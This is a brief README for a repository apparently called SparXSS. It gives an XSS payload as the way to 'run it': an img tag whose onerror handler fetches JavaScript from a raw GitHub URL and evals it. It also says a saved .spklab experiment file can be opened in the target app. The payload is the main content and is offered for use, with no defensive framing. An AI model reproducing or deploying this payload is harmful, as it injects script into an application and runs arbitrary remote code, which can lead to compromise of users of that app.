amukerd/SparXSS/README.md

 Run it using:<br>```<img src=# onerror='fetch("https://raw.githubusercontent.com/Amukerd/SparXSS/main/sparxss.js").then(r => r.text()).then(c => eval(c))'>```

-You Can Also Use The SparXSS.spklab File And Select 'Open Saved Experiment' When You Open The App

 The If Statement In The First Line Was Because It Would Execute Multiple Times While I Was Testing It

 # ToDo